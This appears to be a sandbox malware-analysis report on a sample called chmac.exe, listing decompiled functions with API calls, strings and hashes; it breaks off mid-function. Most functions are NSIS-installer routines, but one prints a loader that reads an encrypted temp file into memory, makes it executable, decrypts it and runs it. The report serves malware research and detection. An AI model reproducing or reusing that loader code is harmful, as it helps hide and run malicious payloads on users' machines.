String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x4d9a0
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0xa1e47
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x80f8a0
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x41253
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x4107e6
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x4d9a0
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x004030c7
0x004030c7
0x004030cd
0x004030cf
0x004030d5
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030d5
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403136
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,000621E4), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,004107E6,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(0004D9A0,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-501415292
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

nsa, xrefs: 00405797
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00405792

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2820259346
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 72EE10A0, Relevance: 6.1, APIs: 4, Instructions: 88
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E72EE10A0(void* __ecx, void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				void* _v24;
				long _v28;
				long _v32;
				short _v1072;
				void _v8520;
				void* _t34;
				intOrPtr _t37;
				struct _OVERLAPPED* _t65;
				void* _t73;

				E72EE1000(0x2144, __ecx);
				_v20 = 0x6e;
				_v18 = 0x66;
				_v16 = 0x6a;
				_v14 = 0x76;
				_v12 = 0x68;
				_v10 = 0x6c;
				_v8 = 0x63;
				_v6 = 0;
				GetTempPathW(0x103,  &_v1072);
				E72EE1030( &_v1072,  &_v20);
				VirtualProtect( &_v8520, 0x1d18, 0x40,  &_v28); // executed
				_t34 = CreateFileW( &_v1072, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v24 = _t34;
				ReadFile(_v24,  &_v8520, 0x1d18,  &_v32, 0); // executed
				_t65 = 0;
				while(1) {
					_t37 =  *((intOrPtr*)(_t73 + _t65 - 0x2144));
					if(_t65 == 0x1d18) {
						break;
					}
					 *((char*)(_t73 + _t65 - 0x2144)) = ((_t37 + 0x00000001 - 0x0000005a + 0x00000001 - 0x49 ^ 0x0000001f) + 0x00000001 - 0x00000001 ^ 0x000000f8) + 1 - 1 + 1 - 0x7c + 1 - 0xffffffffffffffef + 0xf7;
					_t65 =  &(_t65->Internal);
				}
				_v8520();
				return 0;
			}

0x72ee10a8
0x72ee10b2
0x72ee10bb
0x72ee10c4
0x72ee10cd
0x72ee10d6
0x72ee10df
0x72ee10e8
0x72ee10ee
0x72ee10fe
0x72ee110f
0x72ee1129
0x72ee1148
0x72ee114e
0x72ee1167
0x72ee116d
0x72ee1172
0x72ee1172
0x72ee117f
0x00000000
0x00000000
0x72ee11a3
0x72ee11aa
0x72ee11aa
0x72ee11bc
0x72ee11c3

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 72EE10FE
VirtualProtect.KERNELBASE(?,00001D18,00000040,?), ref: 72EE1129
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72EE1148
ReadFile.KERNELBASE(00001D18,?,00001D18,?,00000000), ref: 72EE1167

Memory Dump Source

Source File: 0000000D.00000002.327288219.0000000072EE1000.00000020.00020000.sdmp, Offset: 72EE0000, based on PE: true

Associated: 0000000D.00000002.327262639.0000000072EE0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.327295823.0000000072EE2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_72ee0000_chmac.jbxd

Similarity

API ID: File$CreatePathProtectReadTempVirtual
String ID:
API String ID: 205760209-0
Opcode ID: 7d1922be37484dbc0f73c42925629530580a3bcdea0e455e07b7a59fff7798b6
Instruction ID: 965e791f5c3a527b36e1fc683b9cc790591232dd374a7e68cbf358391d5becd5
Opcode Fuzzy Hash: 7d1922be37484dbc0f73c42925629530580a3bcdea0e455e07b7a59fff7798b6
Instruction Fuzzy Hash: 9C31A531A00208A7FB14DBA4C815BEE773AEF54700F50989CE709AF2C4E6755A458769

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1075807775
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
